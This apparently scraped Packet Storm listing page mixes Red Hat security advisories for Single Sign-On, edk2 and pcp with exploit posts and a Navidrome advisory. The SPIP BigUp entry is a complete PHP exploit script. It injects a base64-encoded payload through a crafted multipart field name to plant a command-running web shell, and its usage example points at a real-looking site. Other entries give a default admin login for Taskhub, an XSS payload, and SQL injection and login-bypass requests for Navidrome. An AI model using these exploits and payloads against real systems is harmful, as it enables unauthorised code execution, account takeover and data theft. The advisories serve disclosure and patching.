Red Hat Security Advisory 2024-6882-03 - A new image is available for Red Hat Single Sign-On 7.6.11, running on OpenShift Container Platform 3.10 and 3.11, and 4.3. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6882.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Single Sign-On 7.6.11 for OpenShift image enhancement updateAdvisory ID:        RHSA-2024:6882-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6882Issue date:         2024-09-19Revision:           03CVE Names:          CVE-2024-8698====================================================================Summary: A new image is available for Red Hat Single Sign-On 7.6.11, running on OpenShift Container Platform 3.10 and 3.11, and 4.3.Description:Red Hat Single Sign-On is an integrated sign-on solution, available as aRed Hat JBoss Middleware for OpenShift containerized image. The Red HatSingle Sign-On for OpenShift image provides an authentication server thatyou can use to log in centrally, log out, and register. You can also manageuser accounts for web applications, mobile applications, and RESTful webservices.Security Fix(es):* Improper Verification of SAML Responses Leading to Privilege Escalation inKeycloak (CVE-2024-8698)* Vulnerable Redirect URI Validation Results in Open Redirec (CVE-2024-8883)This erratum releases a new image for Red Hat Single Sign-On 7.6.11 foruse within the OpenShift Container Platform 3.10, OpenShift Container Platform3.11, and within the OpenShift Container Platform 4.3 cloud computing Platform-as-a-Service (PaaS) foron-premise or private cloud deployments, aligning with the standalone product release.Solution:https://raw.githubusercontent.com/jboss-container-images/redhat-sso-7-openshift-image/v7.6.11.GA/templates/${resource}CVEs:CVE-2024-8698References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2311641https://bugzilla.redhat.com/show_bug.cgi?id=2312511

Red Hat Security Advisory 2024-6882-03

SPIP BigUp version 4.2.15 suffers from a remote PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : SPIP BigUp 4.2.15 php code injection Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP.    The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value.   By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server.   It allows unauthenticated users to execute arbitrary code remotely via the public interface. [+] Line 143 : Set your target & payload .[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass indoushka {    private $targetUri;    private $formPage;    private $payload;    public function __construct($targetUri, $formPage = 'auto', $payload) {        $this->targetUri = $targetUri;        $this->formPage = $formPage;        $this->payload = $payload;    }    public function check() {        $spipVersion = $this->getSpipVersion();        if (!$spipVersion) {            return "Unable to determine the version of SPIP.";        }        echo "SPIP Version detected: " . $spipVersion . "\n";        $vulnerableRanges = [            ['start' => '4.0.0', 'end' => '4.1.17'],            ['start' => '4.2.0', 'end' => '4.2.15'],            ['start' => '4.3.0', 'end' => '4.3.1']        ];        $isVulnerable = false;        foreach ($vulnerableRanges as $range) {            if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) {                $isVulnerable = true;                break;            }        }        if (!$isVulnerable) {            return "The detected SPIP version ($spipVersion) is not vulnerable.";        }        echo "SPIP version $spipVersion is vulnerable.\n";        return "SPIP version $spipVersion is vulnerable.";    }    private function getSpipVersion() {        // This function should make an HTTP request to detect the SPIP version        // Return the version or false if undetectable        return '4.3.1'; // Example version, replace with actual logic    }    private function getFormData() {        $pages = ['login', 'spip_pass', 'contact'];        if ($this->formPage !== 'auto') {            $pages = [$this->formPage];        }        foreach ($pages as $page) {            $url = $this->normalizeUri($page);            $response = $this->sendRequest('GET', $url);            if ($response['status'] === 200) {                libxml_use_internal_errors(true); // Prevent warnings from invalid HTML                $doc = new DOMDocument();                @$doc->loadHTML($response['body']);                libxml_clear_errors();                $inputs = $doc->getElementsByTagName('input');                if ($inputs->length > 1) {                    $action = $inputs->item(0)->getAttribute('value');                    $args = $inputs->item(1)->getAttribute('value');                                        if ($action && $args) {                        echo "Found formulaire_action: $action\n";                        echo "Found formulaire_action_args: " . substr($args, 0, 20) . "...\n";                        return ['action' => $action, 'args' => $args];                    }                }            }        }        return null;    }    private function normalizeUri($page) {        return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/');    }    private function sendRequest($method, $url, $data = null) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        if ($method === 'POST' && $data) {            curl_setopt($ch, CURLOPT_POST, true);            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);            curl_setopt($ch, CURLOPT_HTTPHEADER, [                'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32)            ]);        }        $response = curl_exec($ch);        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['status' => $httpCode, 'body' => $response];    }    private function encodePayload() {        return base64_encode($this->payload);    }    public function exploit() {        $formData = $this->getFormData();        if (!$formData) {            echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n";            return;        }        echo "Preparing to send exploit payload to the target...\n";        $encodedPayload = $this->encodePayload();        $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));        $postData = "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . $this->randomString() . '"' . "\r\n\r\n\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n";        $postData .= "--$boundary--\r\n";        $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData);    }    private function randomString($length = 8) {        return bin2hex(random_bytes($length / 2));    }}// Usage example:$exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>');$exploit->check();$exploit->exploit();?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP BigUp 4.2.15 Code Injection

Red Hat Security Advisory 2024-6880-03 - New Red Hat Single Sign-On 7.6.11 packages are now available for Red Hat Enterprise Linux 9. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6880.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Single Sign-On 7.6.11 security update on RHEL 9Advisory ID:        RHSA-2024:6880-03Product:            Red Hat Single Sign-OnAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6880Issue date:         2024-09-19Revision:           03CVE Names:          CVE-2024-8698====================================================================Summary: New Red Hat Single Sign-On 7.6.11 packages are now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of none. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This release of Red Hat Single Sign-On 7.6.11 on RHEL 9 serves as a replacement for Red Hat Single Sign-On 7.6.10, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.Security Fix(es):* Improper Verification of SAML Responses Leading to Privilege Escalation in Keycloak (CVE-2024-8698)* Vulnerable Redirect URI Validation Results in Open Redirec (CVE-2024-8883)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-8698References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2311641https://bugzilla.redhat.com/show_bug.cgi?id=2312511

Red Hat Security Advisory 2024-6880-03

Red Hat Security Advisory 2024-6879-03 - New Red Hat Single Sign-On 7.6.11 packages are now available for Red Hat Enterprise Linux 8. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6879.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Single Sign-On 7.6.11 security update on RHEL 8Advisory ID:        RHSA-2024:6879-03Product:            Red Hat Single Sign-OnAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6879Issue date:         2024-09-19Revision:           03CVE Names:          CVE-2024-8698====================================================================Summary: New Red Hat Single Sign-On 7.6.11 packages are now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of none. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This release of Red Hat Single Sign-On 7.6.11 on RHEL 8 serves as a replacement for Red Hat Single Sign-On 7.6.10, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.Security Fix(es):* Improper Verification of SAML Responses Leading to Privilege Escalation in Keycloak (CVE-2024-8698)* Vulnerable Redirect URI Validation Results in Open Redirec (CVE-2024-8883)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-8698References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2311641https://bugzilla.redhat.com/show_bug.cgi?id=2312511

Red Hat Security Advisory 2024-6879-03

Taskhub version 3.0.3 suffers from an ignored default credential vulnerability.

**Taskhub 3.0.3 Insecure Settings**

Posted Sep 20, 2024

Authored by indoushka

Taskhub version 3.0.3 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 7505071b9896db1b7f4f5cd911d9d07b06247bd94dbf46777a4481d4b83f1ddd

Download | Favorite | View

**Taskhub 3.0.3 Insecure Settings**

    =============================================================================================================================================| # Title     : Taskhub v3.0.3 Insecure Settings Vulnerability                                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 12345678[+] https://www/127.0.0.1/tasks.octalfoxcom/auth/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,862)
*   Arbitrary (17,077)
*   BBS (2,859)
*   Bypass (1,923)
*   CGI (1,047)
*   Code Execution (7,902)
*   Conference (692)
*   Cracker (845)
*   CSRF (3,427)
*   DoS (25,263)
*   Encryption (2,395)
*   Exploit (54,266)
*   File Inclusion (4,274)
*   File Upload (1,017)
*   Firewall (822)
*   Info Disclosure (2,916)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,281)
*   Local (14,850)
*   Magazine (587)
*   Overflow (13,223)
*   Perl (1,435)
*   PHP (5,271)
*   Proof of Concept (2,411)
*   Protocol (3,749)
*   Python (1,660)
*   Remote (31,888)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (642)
*   Scanner (1,658)
*   Security Tool (8,048)
*   Shell (3,305)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,725)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,092)
*   Web (10,138)
*   Whitepaper (3,784)
*   x86 (970)
*   XSS (18,301)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,114)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,124)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (389)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,237)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,845)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,852)
*   UNIX (9,456)
*   UnixWare (188)
*   Windows (6,772)
*   Other

Taskhub 3.0.3 Insecure Settings

Red Hat Security Advisory 2024-6878-03 - New Red Hat Single Sign-On 7.6.11 packages are now available for Red Hat Enterprise Linux 7. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6878.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Single Sign-On 7.6.11 security update on RHEL 7Advisory ID:        RHSA-2024:6878-03Product:            Red Hat Single Sign-OnAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6878Issue date:         2024-09-19Revision:           03CVE Names:          CVE-2024-8698====================================================================Summary: New Red Hat Single Sign-On 7.6.11 packages are now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of none. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This release of Red Hat Single Sign-On 7.6.11 on RHEL 7 serves as a replacement for Red Hat Single Sign-On 7.6.10, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.Security Fix(es):* Improper Verification of SAML Responses Leading to Privilege Escalation in Keycloak (CVE-2024-8698)* Vulnerable Redirect URI Validation Results in Open Redirec (CVE-2024-8883)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-8698References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2311641https://bugzilla.redhat.com/show_bug.cgi?id=2312511

Red Hat Security Advisory 2024-6878-03

Teacher Subject Allocation Management System version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Teacher Subject Allocation Management System 1.0 XSS Vulnerability                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] In the search box, put your payload.[+] use payload : <script>alert(/indoushka/);</script>[+] http://127.0.0.1/tsas/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Teacher Subject Allocation Management System 1.0 Cross Site Scripting

Red Hat Security Advisory 2024-6849-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6849.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: edk2 security updateAdvisory ID:        RHSA-2024:6849-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6849Issue date:         2024-09-19Revision:           03CVE Names:          CVE-2023-45235====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* edk2: Buffer overflow when handling Server ID option from a DHCPv6 proxy Advertise message (CVE-2023-45235)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45235References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2258700

Red Hat Security Advisory 2024-6849-03

Red Hat Security Advisory 2024-6848-03 - An update for pcp is now available for Red Hat Enterprise Linux 9. Issues addressed include a heap corruption vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6848.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: pcp security updateAdvisory ID:        RHSA-2024:6848-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6848Issue date:         2024-09-19Revision:           03CVE Names:          CVE-2024-45769====================================================================Summary: An update for pcp is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Performance Co-Pilot (PCP) is a suite of tools, services, and libraries for acquisition, archiving, and analysis of system-level performance measurements. Its light-weight distributed architecture makes it particularly well-suited to centralized analysis of complex systems.Security Fix(es):* pcp: pmpost symlink attack allows escalating pcp to root user (CVE-2024-45770)* pcp: pmcd heap corruption through metric pmstore operations (CVE-2024-45769)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-45769References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2310451https://bugzilla.redhat.com/show_bug.cgi?id=2310452https://issues.redhat.com/browse/RHEL-58306

Red Hat Security Advisory 2024-6848-03

# Security Advisory: Multiple Vulnerabilities in Navidrome

## Summary

Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak).

Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections.

Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username.

## Details

### ORM Leak

When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information.

For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`:

```
GET /api/user?_end=36&_order=DESC&password=AAA%
```

This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. (Also, any reason for using encryption instead of hashing?)

### SQL Injections

When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped.

This behavior can be used to inject arbitrary SQL code (SQL Injection), for example:

```
GET /api/album?_end=36&_order=DESC&_sort=recently_added&_start=0&SELECT+*+FROM+USER--=123 HTTP/1.1
```

This is only an example, but you should see an error message in the logs.

### Authentication Weakness

When retrieving the user for authentication, the following code is used:

```go
func (r *userRepository) FindByUsername(username string) (model.User, error) {
    sel := r.newSelect().Columns("").Where(Like{"user_name": username})
    var usr model.User
    err := r.queryOne(sel, &usr)
    return &usr, err
}
```

This relies on a `LIKE` statement and allows users to log in with `%` instead of the legitimate username.

## Proof of Concept (PoC)

See above.

## Impact

These vulnerabilities can be used to leak information and dump the contents of the database.

## Credit

Louis Nyffenegger from PentesterLab

**Security Advisory: Multiple Vulnerabilities in Navidrome****Summary**

Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like password=... in the URL (ORM Leak).

Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections.

Finally, the username is used in a LIKE statement, allowing people to log in with % instead of their username.

**Details****ORM Leak**

When adding parameters to the URL, they are automatically included in an SQL LIKE statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information.

For example, attackers can use the following request to test whether some encrypted passwords start with AAA:

    GET /api/user?_end=36&_order=DESC&password=AAA%
    

This results in an SQL query like password LIKE 'AAA%', allowing attackers to slowly brute-force passwords. (Also, any reason for using encryption instead of hashing?)

**SQL Injections**

When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped.

This behavior can be used to inject arbitrary SQL code (SQL Injection), for example:

    GET /api/album?_end=36&_order=DESC&_sort=recently_added&_start=0&SELECT+*+FROM+USER--=123 HTTP/1.1
    

This is only an example, but you should see an error message in the logs.

**Authentication Weakness**

When retrieving the user for authentication, the following code is used:

func (r \*userRepository) FindByUsername(username string) (model.User, error) {
    sel := r.newSelect().Columns("").Where(Like{"user\_name": username})
    var usr model.User
    err := r.queryOne(sel, &usr)
    return &usr, err
}

This relies on a LIKE statement and allows users to log in with % instead of the legitimate username.

**Proof of Concept (PoC)**

See above.

**Impact**

These vulnerabilities can be used to leak information and dump the contents of the database.

**Credit**

Louis Nyffenegger from PentesterLab

**References**

*   GHSA-58vj-cv5w-v4v6
*   navidrome/navidrome@3107170

Tag

#vulnerability